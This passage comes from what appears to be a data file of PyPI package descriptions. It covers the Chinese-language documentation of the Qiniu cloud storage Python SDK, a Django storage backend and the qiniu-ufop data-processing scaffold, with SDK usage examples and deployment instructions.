e0a\u4f20\u7684\u573a\u666f\u4e4b\u4e0b\uff0c\u6709\u65f6\u5019\u5ba2\u6237\u7aef\u9700\u8981\u5728\u6587\u4ef6\u4e0a\u4f20\u5230\u4e03\u725b\u4e4b\u540e\uff0c\u4ece\u4e1a\u52a1\u670d\u52a1\u5668\u83b7\u53d6\u76f8\u5173\u7684\u4fe1\u606f\uff0c\u8fd9\u4e2a\u65f6\u5019\u5c31\u8981\u7528\u5230\u4e03\u725b\u7684\u4e0a\u4f20\u56de\u8c03\u53ca\u76f8\u5173\u56de\u8c03\u53c2\u6570\u7684\u8bbe\u7f6e\u3002fromqiniu_sdk_alphaimportupload_token,credentialaccess_key='access key'secret_key='secret key'bucket_name='bucket name'object_name='object name'cred=credential.Credential(access_key,secret_key)builder=upload_token.UploadPolicy.new_for_object(bucket_name,object_name,3600)builder.callback(['http://api.example.com/qiniu/upload/callback'],body='{\"key\":\"$(key)\",\"hash\":\"$(etag)\",\"bucket\":\"$(bucket)\",\"fsize\":$(fsize)}',body_type='application/json')upload_token=builder.build().to_upload_token_provider(cred)print(upload_token)\u5728\u4f7f\u7528\u4e86\u4e0a\u4f20\u56de\u8c03\u7684\u60c5\u51b5\u4e0b\uff0c\u5ba2\u6237\u7aef\u6536\u5230\u7684\u56de\u590d\u5c31\u662f\u4e1a\u52a1\u670d\u52a1\u5668\u54cd\u5e94\u4e03\u725b\u7684JSON\u683c\u5f0f\u5185\u5bb9\u3002\n\u901a\u5e38\u60c5\u51b5\u4e0b\uff0c\u6211\u4eec\u5efa\u8bae\u4f7f\u7528application/json\u683c\u5f0f\u6765\u8bbe\u7f6ecallback_body\uff0c\u4fdd\u6301\u6570\u636e\u683c\u5f0f\u7684\u7edf\u4e00\u6027\u3002\u5b9e\u9645\u60c5\u51b5\u4e0b\uff0ccallback_body\u4e5f\u652f\u6301application/x-www-form-urlencoded\u683c\u5f0f\u6765\u7ec4\u7ec7\u5185\u5bb9\uff0c\u8fd9\u4e2a\u4e3b\u8981\u770b\u4e1a\u52a1\u670d\u52a1\u5668\u5728\u63a5\u6536\u5230callback_body\u7684\u5185\u5bb9\u65f6\u5982\u4f55\u89e3\u6790\u3002\u4f8b\u5982\uff1afromqiniu_sdk_alphaimportupload_token,credentialaccess_key='access key'secret_key='secret key'bucket_name='bucket name'object_name='object name'cred=credential.Credential(access_key,secret_key)builder=upload_token.UploadPolicy.new_for_object(bucket_name,object_name,3600)builder.callback(['http://api.example.com/qiniu/upload/callback'],body='key=$(key)&hash=$(etag)&bucket=$(bucket)&fsize=$(fsize)')upload_token=builder.build().to_upload_token_provider(cred)print(upload_token)\u670d\u52a1\u7aef\u76f4\u4f20\u670d\u52a1\u7aef\u76f4\u4f20\u662f\u6307\u5ba2\u6237\u5229\u7528\u4e03\u725b\u670d\u52a1\u7aef SDK \u4ece\u670d\u52a1\u7aef\u76f4\u63a5\u4e0a\u4f20\u6587\u4ef6\u5230\u4e03\u725b\u4e91\uff0c\u4ea4\u4e92\u7684\u53cc\u65b9\u4e00\u822c\u90fd\u5728\u673a\u623f\u91cc\u9762\uff0c\u6240\u4ee5\u670d\u52a1\u7aef\u53ef\u4ee5\u81ea\u5df1\u751f\u6210\u4e0a\u4f20\u51ed\u8bc1\uff0c\u7136\u540e\u5229\u7528 SDK \u4e2d\u7684\u4e0a\u4f20\u903b\u8f91\u8fdb\u884c\u4e0a\u4f20\uff0c\u6700\u540e\u4ece\u4e03\u725b\u4e91\u83b7\u53d6\u4e0a\u4f20\u7684\u7ed3\u679c\uff0c\u8fd9\u4e2a\u8fc7\u7a0b\u4e2d\u7531\u4e8e\u53cc\u65b9\u90fd\u662f\u4e1a\u52a1\u670d\u52a1\u5668\uff0c\u6240\u4ee5\u5f88\u5c11\u5229\u7528\u5230\u4e0a\u4f20\u56de\u8c03\u7684\u529f\u80fd\uff0c\u800c\u662f\u76f4\u63a5\u81ea\u5b9a\u4e49returnBody\u6765\u83b7\u53d6\u81ea\u5b9a\u4e49\u7684\u56de\u590d\u5185\u5bb9\u3002\u6587\u4ef6\u4e0a\u4f20\u6700\u7b80\u5355\u7684\u5c31\u662f\u4e0a\u4f20\u672c\u5730\u6587\u4ef6\uff0c\u76f4\u63a5\u6307\u5b9a\u6587\u4ef6\u7684\u5b8c\u6574\u8def\u5f84\u5373\u53ef\u4e0a\u4f20\u3002fromqiniu_sdk_alphaimportupload,credentialaccess_key='access key'secret_key='secret key'bucket_name='bucket name'object_name='object name'cred=credential.Credential(access_key,secret_key)upload_manager=upload.UploadManager(upload.UploadTokenSigner.new_credential_provider(cred,bucket_name,3600))uploader=upload_manager.auto_uploader()uploader.upload_path('/home/qiniu/test.png',object_name=object_name,file_name=object_name)\u5728\u8fd9\u4e2a\u573a\u666f\u4e0b\uff0cAutoUploader\u4f1a\u81ea\u52a8\u6839\u636e\u6587\u4ef6\u5c3a\u5bf8\u5224\u5b9a\u662f\u5426\u542f\u7528\u65ad\u70b9\u7eed\u4e0a\u4f20\uff0c\u5982\u679c\u6587\u4ef6\u8f83\u5927\uff0c\u4e0a\u4f20\u4e86\u4e00\u90e8\u5206\u65f6\u56e0\u5404\u79cd\u539f\u56e0\u4ece\u800c\u4e2d\u65ad\uff0c\u518d\u91cd\u65b0\u6267\u884c\u76f8\u540c\u7684\u4ee3\u7801\u65f6\uff0cSDK \u4f1a\u5c1d\u8bd5\u627e\u5230\u5148\u524d\u6ca1\u6709\u5b8c\u6210\u7684\u4e0a\u4f20\u4efb\u52a1\uff0c\u4ece\u800c\u7ee7\u7eed\u8fdb\u884c\u4e0a\u4f20\u3002\u5b57\u8282\u6570\u7ec4\u4e0a\u4f20 / \u6570\u636e\u6d41\u4e0a\u4f20\u53ef\u4ee5\u652f\u6301\u5c06\u5185\u5b58\u4e2d\u7684\u5b57\u8282\u6570\u7ec4\u6216\u5b9e\u73b0\u4e86read\u65b9\u6cd5\u7684\u5b9e\u4f8b\u4e0a\u4f20\u5230\u7a7a\u95f4\u4e2d\u3002fromqiniu_sdk_alphaimportupload,credentialimportioaccess_key='access key'secret_key='secret key'bucket_name='bucket name'object_name='object name'cred=credential.Credential(access_key,secret_key)upload_manager=upload.UploadManager(upload.UploadTokenSigner.new_credential_provider(cred,bucket_name,3600))uploader=upload_manager.auto_uploader()uploader.upload_reader(io.BytesIO(b'hello qiniu cloud'),object_name=object_name,file_name=object_name)\u81ea\u5b9a\u4e49\u53c2\u6570\u4e0a\u4f20fromqiniu_sdk_alphaimportupload,credentialdefon_policy_generated(builder):builder.return_body='{\"key\":\"$(key)\",\"hash\":\"$(etag)\",\"fname\":\"$(x:fname)\",\"age\":$(x:age)}'access_key='access key'secret_key='secret key'bucket_name='bucket name'object_name='object name'cred=credential.Credential(access_key,secret_key)upload_manager=upload.UploadManager(upload.UploadTokenSigner.new_credential_provider(cred,bucket_name,3600,on_policy_generated=on_policy_generated))uploader=upload_manager.auto_uploader()uploader.upload_path('/home/qiniu/test.png',object_name=object_name,file_name=object_name,custom_vars={'fname':'123.jpg','age':'20'})\u79c1\u6709\u4e91\u4e0a\u4f20fromqiniu_sdk_alphaimportupload,credential,http_clientaccess_key='access key'secret_key='secret key'bucket_name='bucket name'object_name='object name'cred=credential.Credential(access_key,secret_key)upload_manager=upload.UploadManager(upload.UploadTokenSigner.new_credential_provider(cred,bucket_name,3600),uc_endpoints=http_client.Endpoints(['ucpub-qos.pocdemo.qiniu.io']))uploader=upload_manager.auto_uploader()uploader.upload_path('/home/qiniu/test.png',object_name=object_name,file_name=object_name)\u4e0b\u8f7d\u6587\u4ef6\u6587\u4ef6\u4e0b\u8f7d\u5206\u4e3a\u516c\u5f00\u7a7a\u95f4\u7684\u6587\u4ef6\u4e0b\u8f7d\u548c\u79c1\u6709\u7a7a\u95f4\u7684\u6587\u4ef6\u4e0b\u8f7d\u3002\u516c\u5f00\u7a7a\u95f4fromqiniu_sdk_alphaimportdownloadobject_name='\u516c\u53f8/\u5b58\u50a8/qiniu.jpg'domain='devtools.qiniu.com'path='/home/user/qiniu.jpg'download_manager=download.DownloadManager(download.StaticDomainsUrlsGenerator([domain],use_https=False))# \u8bbe\u7f6e\u4e3a HTTP \u534f\u8baedownload_manager.download_to_path(object_name,path)\u79c1\u6709\u7a7a\u95f4fromqiniu_sdk_alphaimportdownload,credentialobject_name='\u516c\u53f8/\u5b58\u50a8/qiniu.jpg'domain='devtools.qiniu.com'path='/home/user/qiniu.jpg'access_key='access key'secret_key='secret key'cred=credential.Credential(access_key,secret_key)download_manager=download.DownloadManager(download.UrlsSigner(cred,download.StaticDomainsUrlsGenerator([domain],use_https=False)))# \u8bbe\u7f6e\u4e3a HTTP \u534f\u8baedownload_manager.download_to_path(object_name,path)\u8d44\u6e90\u7ba1\u7406\u83b7\u53d6\u6587\u4ef6\u4fe1\u606ffromqiniu_sdk_alphaimportobjects,credentialaccess_key='access key'secret_key='secret key'bucket_name='bucket name'object_name='object name'cred=credential.Credential(access_key,secret_key)bucket=objects.ObjectsManager(cred).bucket(bucket_name)response=bucket.stat_object(object_name).call()print(response['hash'])print(response['fsize'])print(response['mimeType'])print(response['putTime'])\u4fee\u6539\u6587\u4ef6\u7c7b\u578bfromqiniu_sdk_alphaimportobjects,credentialaccess_key='access key'secret_key='secret key'bucket_name='bucket name'object_name='object name'cred=credential.Credential(access_key,secret_key)bucket=objects.ObjectsManager(cred).bucket(bucket_name)bucket.modify_object_metadata(object_name,'application/json').call()\u79fb\u52a8\u6216\u91cd\u547d\u540d\u6587\u4ef6\u79fb\u52a8\u64cd\u4f5c\u672c\u8eab\u652f\u6301\u79fb\u52a8\u6587\u4ef6\u5230\u76f8\u540c\uff0c\u4e0d\u540c\u7a7a\u95f4\u4e2d\uff0c\u5728\u79fb\u52a8\u7684\u540c\u65f6\u4e5f\u53ef\u4ee5\u652f\u6301\u6587\u4ef6\u91cd\u547d\u540d\u3002\u552f\u4e00\u7684\u9650\u5236\u6761\u4ef6\u662f\uff0c\u79fb\u52a8\u7684\u6e90\u7a7a\u95f4\u548c\u76ee\u6807\u7a7a\u95f4\u5fc5\u987b\u5728\u540c\u4e00\u4e2a\u673a\u623f\u3002fromqiniu_sdk_alphaimportobjects,credentialaccess_key='access key'secret_key='secret key'bucket_name='bucket name'object_name='object name'to_bucket_name='to bucket name\"to_object_name=\"new object name\"cred=credential.Credential(access_key,secret_key)bucket=objects.ObjectsManager(cred).bucket(bucket_name)bucket.move_object_to(object_name,to_bucket_name,to_object_name).call()\u590d\u5236\u6587\u4ef6\u526f\u672c\u6587\u4ef6\u7684\u590d\u5236\u548c\u6587\u4ef6\u79fb\u52a8\u5176\u5b9e\u64cd\u4f5c\u4e00\u6837\uff0c\u4e3b\u8981\u7684\u533a\u522b\u662f\u79fb\u52a8\u540e\u6e90\u6587\u4ef6\u4e0d\u5b58\u5728\u4e86\uff0c\u800c\u590d\u5236\u7684\u7ed3\u679c\u662f\u6e90\u6587\u4ef6\u8fd8\u5b58\u5728\uff0c\u53ea\u662f\u591a\u4e86\u4e00\u4e2a\u65b0\u7684\u6587\u4ef6\u526f\u672c\u3002fromqiniu_sdk_alphaimportobjects,credentialaccess_key='access key'secret_key='secret key'bucket_name='bucket name'object_name='object name'to_bucket_name=\"to bucket name\"to_object_name=\"new object name\"cred=credential.Credential(access_key,secret_key)bucket=objects.ObjectsManager(cred).bucket(bucket_name)bucket.copy_object_to(object_name,to_bucket_name,to_object_name).call()\u5220\u9664\u7a7a\u95f4\u4e2d\u7684\u6587\u4ef6fromqiniu_sdk_alphaimportobjects,credentialaccess_key='access key'secret_key='secret key'bucket_name='bucket name'object_name='object name'cred=credential.Credential(access_key,secret_key)bucket=objects.ObjectsManager(cred).bucket(bucket_name)bucket.delete_object(object_name).call()\u8bbe\u7f6e\u6216\u66f4\u65b0\u6587\u4ef6\u7684\u751f\u5b58\u65f6\u95f4\u53ef\u4ee5\u7ed9\u5df2\u7ecf\u5b58\u5728\u4e8e\u7a7a\u95f4\u4e2d\u7684\u6587\u4ef6\u8bbe\u7f6e\u6587\u4ef6\u751f\u5b58\u65f6\u95f4\uff0c\u6216\u8005\u66f4\u65b0\u5df2\u8bbe\u7f6e\u4e86\u751f\u5b58\u65f6\u95f4\u4f46\u5c1a\u672a\u88ab\u5220\u9664\u7684\u6587\u4ef6\u7684\u65b0\u7684\u751f\u5b58\u65f6\u95f4\u3002fromqiniu_sdk_alphaimportobjects,credentialaccess_key='access key'secret_key='secret key'bucket_name='bucket name'object_name='object name'cred=credential.Credential(access_key,secret_key)bucket=objects.ObjectsManager(cred).bucket(bucket_name)bucket.modify_object_life_cycle(object_name,delete_after_days=10).call()\u83b7\u53d6\u7a7a\u95f4\u6587\u4ef6\u5217\u8868fromqiniu_sdk_alphaimportobjects,credentialaccess_key='access key'secret_key='secret key'bucket_name='bucket name'cred=credential.Credential(access_key,secret_key)bucket=objects.ObjectsManager(cred).bucket(bucket_name)forobjinbucket.list():print('%s\\nhash:%s\\nsize:%d\\nmime type:%s'%(obj['key'],obj['hash'],obj['fsize'],obj['mimeType']))\u79c1\u6709\u4e91\u4e2d\u83b7\u53d6\u7a7a\u95f4\u6587\u4ef6\u5217\u8868fromqiniu_sdk_alphaimportobjects,credential,http_clientaccess_key='access key'secret_key='secret key'bucket_name='bucket name'cred=credential.Credential(access_key,secret_key)bucket=objects.ObjectsManager(cred,uc_endpoints=http_client.Endpoints(['ucpub-qos.pocdemo.qiniu.io']),use_https=False).bucket(bucket_name)# \u79c1\u6709\u4e91\u666e\u904d\u4f7f\u7528 HTTP \u534f\u8bae\uff0c\u800c SDK \u5219\u9ed8\u8ba4\u4e3a HTTPS \u534f\u8baeforobjinbucket.list():print('%s\\nhash:%s\\nsize:%d\\nmime type:%s'%(obj['key'],obj['hash'],obj['fsize'],obj['mimeType']))\u8d44\u6e90\u7ba1\u7406\u6279\u91cf\u64cd\u4f5c\u6279\u91cf\u83b7\u53d6\u6587\u4ef6\u4fe1\u606ffromqiniu_sdk_alphaimportobjects,credentialaccess_key='access key'secret_key='secret key'bucket_name='bucket name'cred=credential.Credential(access_key,secret_key)bucket=objects.ObjectsManager(cred).bucket(bucket_name)forresultinbucket.batch_ops([bucket.stat_object('qiniu.jpg'),bucket.stat_object('qiniu.mp4'),bucket.stat_object('qiniu.png'),]):ifresult.error:print('error:%s'%result.error)else:print('hash:%s\\nsize:%d\\nmime type:%s'%(result.data['hash'],result.data['fsize'],result.data['mimeType']))\u6279\u91cf\u4fee\u6539\u6587\u4ef6\u7c7b\u578bfromqiniu_sdk_alphaimportobjects,credentialaccess_key='access key'secret_key='secret key'bucket_name='bucket name'cred=credential.Credential(access_key,secret_key)bucket=objects.ObjectsManager(cred).bucket(bucket_name)forresultinbucket.batch_ops([bucket.modify_object_metadata('qiniu.jpg','image/jpeg'),bucket.modify_object_metadata('qiniu.mp4','image/png'),bucket.modify_object_metadata('qiniu.png','video/mp4'),]):ifresult.error:print('error:%s'%result.error)else:print('ok')\u6279\u91cf\u5220\u9664\u6587\u4ef6fromqiniu_sdk_alphaimportobjects,credentialaccess_key='access key'secret_key='secret key'bucket_name='bucket name'cred=credential.Credential(access_key,secret_key)bucket=objects.ObjectsManager(cred).bucket(bucket_name)forresultinbucket.batch_ops([bucket.delete_object('qiniu.jpg'),bucket.delete_object('qiniu.mp4'),bucket.delete_object('qiniu.png'),]):ifresult.error:print('error:%s'%result.error)else:print('ok')\u6279\u91cf\u79fb\u52a8\u6216\u91cd\u547d\u540d\u6587\u4ef6fromqiniu_sdk_alphaimportobjects,credentialaccess_key='access key'secret_key='secret key'bucket_name='bucket name'cred=credential.Credential(access_key,secret_key)bucket=objects.ObjectsManager(cred).bucket(bucket_name)forresultinbucket.batch_ops([bucket.move_object_to('qiniu.jpg',bucket_name,'qiniu.jpg.move'),bucket.move_object_to('qiniu.mp4',bucket_name,'qiniu.mp4.move'),bucket.move_object_to('qiniu.png',bucket_name,'qiniu.png.move'),]):ifresult.error:print('error:%s'%result.error)else:print('ok')\u6279\u91cf\u590d\u5236\u6587\u4ef6fromqiniu_sdk_alphaimportobjects,credentialaccess_key='access key'secret_key='secret key'bucket_name='bucket name'cred=credential.Credential(access_key,secret_key)bucket=objects.ObjectsManager(cred).bucket(bucket_name)forresultinbucket.batch_ops([bucket.copy_object_to('qiniu.jpg',bucket_name,'qiniu.jpg.move'),bucket.copy_object_to('qiniu.mp4',bucket_name,'qiniu.mp4.move'),bucket.copy_object_to('qiniu.png',bucket_name,'qiniu.png.move'),]):ifresult.error:print('error:%s'%result.error)else:print('ok')\u6279\u91cf\u89e3\u51bb\u5f52\u6863\u5b58\u50a8\u7c7b\u578b\u6587\u4ef6fromqiniu_sdk_alphaimportobjects,credentialaccess_key='access key'secret_key='secret key'bucket_name='bucket name'cred=credential.Credential(access_key,secret_key)bucket=objects.ObjectsManager(cred).bucket(bucket_name)forresultinbucket.batch_ops([bucket.restore_archived_object('qiniu.jpg',7),bucket.restore_archived_object('qiniu.mp4',7),bucket.restore_archived_object('qiniu.png',7),]):ifresult.error:print('error:%s'%result.error)else:print('ok')\u6700\u4f4e\u652f\u6301\u7684 Python \u7248\u672c\uff08MSPV\uff093.8.0\u6700\u4f4e\u652f\u6301\u7684 Rust \u7248\u672c\uff08MSRV\uff091.60.0\u7f16\u7801\u89c4\u8303\u901a\u8fc7cargo clippy\u68c0\u67e5\uff0c\u5e76\u7ecf\u8fc7rustfmt\u683c\u5f0f\u5316\u3002\u6240\u6709\u516c\u5f00\u63a5\u53e3\u90fd\u9700\u8981\u6587\u6863\u6ce8\u91ca\u3002\u6240\u6709\u963b\u585e\u64cd\u4f5c\u90fd\u63d0\u4f9b\u5f02\u6b65\u65e0\u963b\u585e\u7248\u672c\u3002\u5c3d\u53ef\u80fd\u4fdd\u8bc1\u4ec5\u4f7f\u7528\u5b89\u5168\u7684\u4ee3\u7801\u3002\u8054\u7cfb\u6211\u4eec\u5982\u679c\u9700\u8981\u5e2e\u52a9\uff0c\u8bf7\u63d0\u4ea4\u5de5\u5355\uff08\u5728portal\u53f3\u4fa7\u70b9\u51fb\u54a8\u8be2\u548c\u5efa\u8bae\u63d0\u4ea4\u5de5\u5355\uff0c\u6216\u8005\u76f4\u63a5\u5411support@qiniu.com\u53d1\u9001\u90ae\u4ef6\uff09\u5982\u679c\u6709\u4ec0\u4e48\u95ee\u9898\uff0c\u53ef\u4ee5\u5230\u95ee\u7b54\u793e\u533a\u63d0\u95ee\uff0c\u95ee\u7b54\u793e\u533a\u66f4\u8be6\u7ec6\u7684\u6587\u6863\uff0c\u89c1\u5b98\u65b9\u6587\u6863\u7ad9\u5982\u679c\u53d1\u73b0\u4e86bug\uff0c \u6b22\u8fce\u63d0\u4ea4Issue\u5982\u679c\u6709\u529f\u80fd\u9700\u6c42\uff0c\u6b22\u8fce\u63d0\u4ea4Issue\u5982\u679c\u8981\u63d0\u4ea4\u4ee3\u7801\uff0c\u6b22\u8fce\u63d0\u4ea4Pull Request\u6b22\u8fce\u5173\u6ce8\u6211\u4eec\u7684\u5fae\u4fe1\u5fae\u535a\uff0c\u53ca\u65f6\u83b7\u53d6\u52a8\u6001\u4fe1\u606f\u3002\u4ee3\u7801\u8bb8\u53efThis project is licensed under theMIT license."} +{"package": "qiniu-storage", "pacakge-description": "Django storage power by qiniu store"} +{"package": "qiniu-ufop", "pacakge-description": "Qiniu-ufop\u672c\u9879\u76ee\u63d0\u4f9b\u4e00\u4e2a\u4fbf\u6377\u9ad8\u6027\u80fd\u7684\u4e03\u725b\u81ea\u5b9a\u4e49\u6570\u636e\u5904\u7406\u811a\u624b\u67b6,\u4ee5\u4fbf\u5f00\u53d1\u4eba\u5458\u4e13\u6ce8\u6570\u636e\u5904\u7406\u4e1a\u52a1\u903b\u8f91.\u76ee\u524d\u5c1a\u672a\u7f16\u5199\u5355\u5143\u6d4b\u8bd5,\u4e5f\u6ca1\u6709\u5b8c\u5584\u7684\u5f02\u5e38\u5904\u7406\u673a\u5236.\u91c7\u7528Python 3.6\u8fdb\u884c\u5f00\u53d1,\u4e0d\u786e\u4fdd\u5176\u4ed6\u7248\u672c\u8fd0\u884c\u6b63\u5e38.\u9879\u76ee\u5b98\u65b9\u7ad9\u70b9https://github.com/Xavier-Lam/qiniu-ufopQuickstart\u5b89\u88c5\u5f00\u59cb\u9879\u76ee\u7f16\u5199\u4e1a\u52a1\u4ee3\u7801\u672c\u5730\u8fd0\u884c\u9879\u76ee\u751f\u6210Dockerfile\u5e76\u53d1\u5e03\u6fc0\u6d3b\u6ce8\u610f\u5f00\u53d1\u4f7f\u7528\u547d\u4ee4\u884c\u5de5\u5177\u4e00\u952e\u90e8\u7f72\u624b\u5de5\u90e8\u7f72\u751f\u6210\u955c\u50cf\u4e0a\u8f7d\u81ea\u5b9a\u4e49\u5904\u7406\u7a0b\u5e8f\u914d\u7f6e\u8c03\u8bd5\u672c\u5730\u8c03\u8bd5\u5904\u7406\u7a0b\u5e8f\u672c\u5730\u8c03\u8bd5webserver\u672c\u5730\u8c03\u8bd5Docker\u95ee\u9898\u6392\u67e5\u65e5\u5fd7\u67e5\u770b\u90e8\u7f72\u8fc7\u7a0b\u4e2d\u9047\u5230\u7684\u5f02\u5e38Cookbook\u4f7f\u7528git\u66f4\u65b0\u4ee3\u7801TODOS:Quickstart\u5b89\u88c5\u901a\u8fc7pip\u5b89\u88c5\u9879\u76eepip install qiniu-ufop\u5f00\u59cb\u9879\u76ee\u4f7f\u7528qiniu-ufop\u547d\u4ee4,\u5feb\u901f\u751f\u6210\u9879\u76eeqiniu-ufop createproject\u901a\u8fc7createproject\u547d\u4ee4,qiniu-ufop\u5728\u5f53\u524d\u76ee\u5f55\u4e0b\u751f\u6210\u4e86\u4e00\u4e2aapp.py\u6587\u4ef6.\u7f16\u5199\u4e1a\u52a1\u4ee3\u7801\u4ee5\u4e0b\u662f\u4e00\u4e2a\u7b80\u5355\u793a\u4f8b:# app.py\n\nfrom qiniu_ufop import QiniuUFOP\n\nufop = QiniuUFOP()\n\n@ufop.task(route=r\"^(?:/(?P\\w+))?$\")\ndef debug(buffer, args, content_type):\n return \"hello \" + args.get(\"name\", \"world\")\u5047\u8bbe\u8be5\u81ea\u5b9a\u4e49\u6570\u636e\u5904\u7406\u540d\u79f0\u4e3aqiniu,\u5f85\u5904\u7406\u7684\u6587\u4ef6\u94fe\u63a5\u4e3ahttps://qbox.me/example.jpg. \u5219\u8c03\u7528\u94fe\u63a5\u662fhttps://qbox.me/example.jpg?qiniu/qq*,\u54cd\u5e94\u8f93\u51fa\u4e3a*helloqq\u7f16\u5199\u8bf4\u660e\u53c2\u89c1\u5f00\u53d1\u7ae0\u8282\u672c\u5730\u8fd0\u884c\u9879\u76eeqiniu-ufop runserver --debug\nqiniu-ufop runworker\u6ce8\u610f: \u5728windows\u4e0b\u5f00\u53d1\u9700\u989d\u5916\u5b89\u88c5eventlet,\u8fd0\u884crunworker\u65f6\u4f7f\u7528\u547d\u4ee4qiniu-ufop runworker -P eventlet\u8be6\u89c1\u8c03\u8bd5\u7ae0\u8282\u751f\u6210Dockerfile\u5e76\u53d1\u5e03qiniu-ufop deploy -t -n -v \u8be5\u547d\u4ee4\u4e3a\u4e00\u952e\u90e8\u7f72\u547d\u4ee4,\u4e00\u952e\u90e8\u7f72\u9700\u6ee1\u8db3\u76f8\u5173\u6761\u4ef6,\u8bf7\u53c2\u9605\u4e00\u952e\u90e8\u7f72\u7ae0\u8282.\u5982\u9700\u5b9a\u5236\u5316\u90e8\u7f72,\u53ef\u53c2\u89c1\u624b\u5de5\u90e8\u7f72\u7ae0\u8282\u6fc0\u6d3b\u5728\u4f60\u7684\u81ea\u5b9a\u4e49\u5904\u7406\u7684\u7248\u672c\u5217\u8868\u4e2d\u8c03\u6574\u5b9e\u4f8b\u6570,\u5373\u53ef\u4f7f\u7528\u6ce8\u610f\u4e03\u725b\u6709\u4e00\u4e2aBUG,\u5728\u4ee3\u7801\u4e2d\u6ca1\u529e\u6cd5\u53d6\u5230\u6b63\u786e\u7684cpu\u6838\u6570\u4f7f\u7528\u4e00\u952e\u90e8\u7f72,\u6846\u67b6\u4f1a\u53d6\u4e00\u952e\u90e8\u7f72\u7684\u914d\u7f6e\u9879flavor(\u5b9e\u4f8b\u7c7b\u578b,\u9ed8\u8ba4C1M1)\u4f5c\u4e3aCPU\u6838\u6570,\u5f00\u542f\u76f8\u5e94\u6570\u91cf\u7684worker\u53caweb\u81ea\u884c\u90e8\u7f72\u65f6,\u8bf7\u52a1\u5fc5\u5728\u73af\u5883\u53d8\u91cf(\u5f00\u53d1\u8def\u5f84\u4e0b\u7684.env\u6587\u4ef6)\u4e2d\u5199\u5165CPU\u6838\u6570CPU_COUNT\u6216\u5b9e\u4f8b\u914d\u7f6eFLAVOR,\u624d\u80fd\u5f00\u542f\u6b63\u786e\u6570\u91cf\u7684worker\u53caweb,\u5426\u5219,qiniu-ufop\u5c06\u9ed8\u8ba4\u53d6\u5355\u6838,\u4e5f\u5c31\u662f\u5355\u5b9e\u4f8b\u8fd0\u884cweb\u53caworker\u5f00\u53d1\u6570\u636e\u5904\u7406\u5668\u5b9e\u9645\u4e0a\u662f\u4e00\u4e2acelery\u4efb\u52a1,\u8fd9\u4e2a\u4efb\u52a1\u5fc5\u987b\u63a5\u53d7\u4e00\u4e2aroute\u53c2\u6570,\u6307\u660e\u4f1a\u8def\u7531\u5230\u8be5\u5904\u7406\u5668\u7684cmd,\u5982\u679c\u5168\u5c40\u53ea\u6709\u4e00\u4e2a\u5904\u7406\u5668,\u53ef\u4ee5\u4f7f\u7528.*\u6216^$\u4f5c\u4e3a\u8def\u7531.\u7406\u8bba\u4e0a\u53ef\u4ee5\u4f7f\u7528celery\u590d\u6742\u7684\u4efb\u52a1\u5206\u53d1.\u88ab\u88c5\u9970\u7684\u5904\u7406\u8d77\u63a5\u53d7\u4e09\u4e2a\u53c2\u6570,\u7b2c\u4e00\u4e2a\u662f\u5f85\u5904\u7406\u6587\u4ef6\u7684io.BytesIO,\u7b2c\u4e8c\u4e2a\u662f\u8def\u7531\u5339\u914d\u5230\u7684\u53c2\u6570\u5b57\u5178,\u7b2c\u4e09\u4e2a\u662f\u6587\u4ef6\u7684Content-Type.\u5904\u7406\u5668\u8fd4\u56de\u5b57\u7b26\u4e32,bytes,json\u6216\u662f\u4e00\u4e2aqiniu_ufop.Response\u5bf9\u8c61.\u65e5\u5fd7\u53ef\u76f4\u63a5\u8f93\u51fastderr.\u4f7f\u7528\u547d\u4ee4\u884c\u5de5\u5177\u53ef\u901a\u8fc7qiniu-ufop -h\u770b\u5230\u8be6\u7ec6\u8bf4\u660e\u4e00\u952e\u90e8\u7f72\u4e00\u952e\u90e8\u7f72\u5047\u8bbe\u7528\u6237\u672c\u5730\u5b89\u88c5\u6709docker\u73af\u5883\u5df2\u5b89\u88c5\u5e76\u767b\u9646qdoractl,qdoractl\u5728PATH\u4e2d\u5df2\u6ce8\u518c\u81ea\u5b9a\u4e49\u5904\u7406\u7a0b\u5e8fqiniu-ufop deploy -t -n -v \u624b\u5de5\u90e8\u7f72\u5b98\u65b9\u6587\u6863\u6b64\u7ae0\u8282\u5047\u5b9a\u7528\u6237\u5df2\u5b8c\u6210\u81ea\u5b9a\u4e49\u6570\u636e\u5904\u7406\u7a0b\u5e8f\u7684\u5f00\u53d1,\u672c\u5730\u5b89\u88c5\u6709docker\u73af\u5883,\u5e76\u5904\u5728\u81ea\u5b9a\u4e49\u5904\u7406\u7a0b\u5e8f\u76ee\u5f55\u4e0b\u751f\u6210\u955c\u50cf\u6784\u5efadocker\u955c\u50cfdocker build . -t \u4e0a\u8f7d\u81ea\u5b9a\u4e49\u5904\u7406\u7a0b\u5e8f\u4e0b\u8f7d\u81ea\u5b9a\u4e49\u6570\u636e\u5904\u7406\u547d\u4ee4\u884c\u5de5\u5177\u4f7f\u7528accesskey\u53casecretkey\u767b\u9646qdoractl login -u \u5982\u679c\u4f60\u5c1a\u672a\u521b\u5efa\u4f60\u7684\u81ea\u5b9a\u4e49\u5904\u7406\u7a0b\u5e8f,\u8bf7\u521b\u5efaqdoractl register [-d ]\u4e0a\u8f7d\u81ea\u5b9a\u4e49\u5904\u7406\u7a0b\u5e8fqdoractl push \u914d\u7f6e\u5b98\u65b9\u6587\u6863\u81ea\u5b9a\u4e49\u6570\u636e\u5904\u7406\u540e\u53f0\u5176\u4ed6\u4f9d\u7167\u5b98\u65b9\u6587\u6863\u914d\u7f6e,\u5728\u9ad8\u7ea7\u914d\u7f6e\u4e2d\u5065\u5eb7\u914d\u7f6ePath\u8bf7\u586b\u5199/health\u65e5\u5fd7\u8def\u5f84\u6dfb\u52a0\u4efb\u52a1\u5904\u7406\u5f02\u5e38\u65e5\u5fd7/var/log/worker/web\u5904\u7406\u5f02\u5e38\u65e5\u5fd7/var/log/server/supervisor\u65e5\u5fd7/var/log/supervisor/\u8c03\u8bd5\u672c\u5730\u8c03\u8bd5\u5904\u7406\u7a0b\u5e8f\u53ef\u901a\u8fc7qiniu-ufop\u5bf9\u5904\u7406\u7a0b\u5e8f\u8fdb\u884c\u8c03\u8bd5qiniu-ufop process [] \u6ce8\u610f:\u6b64\u5904\u7684cmd\u662f\u4e0d\u5305\u62ec\u5904\u7406\u7a0b\u5e8f\u540d\u7684\u547d\u4ee4\u7684\u7ed3\u679c\u5c06\u76f4\u63a5\u6253\u5370\u518d\u63a7\u5236\u53f0\u4e0a,\u5982\u9700\u6301\u4e45\u5316,\u53ef\u4f7f\u7528output\u53c2\u6570,\u4f8b\u5982qiniu-ufop process test.png -o output.png\u672c\u5730\u8c03\u8bd5webserver\u542f\u52a8\u670d\u52a1\u5668\u53caworkerqiniu-ufop runserver 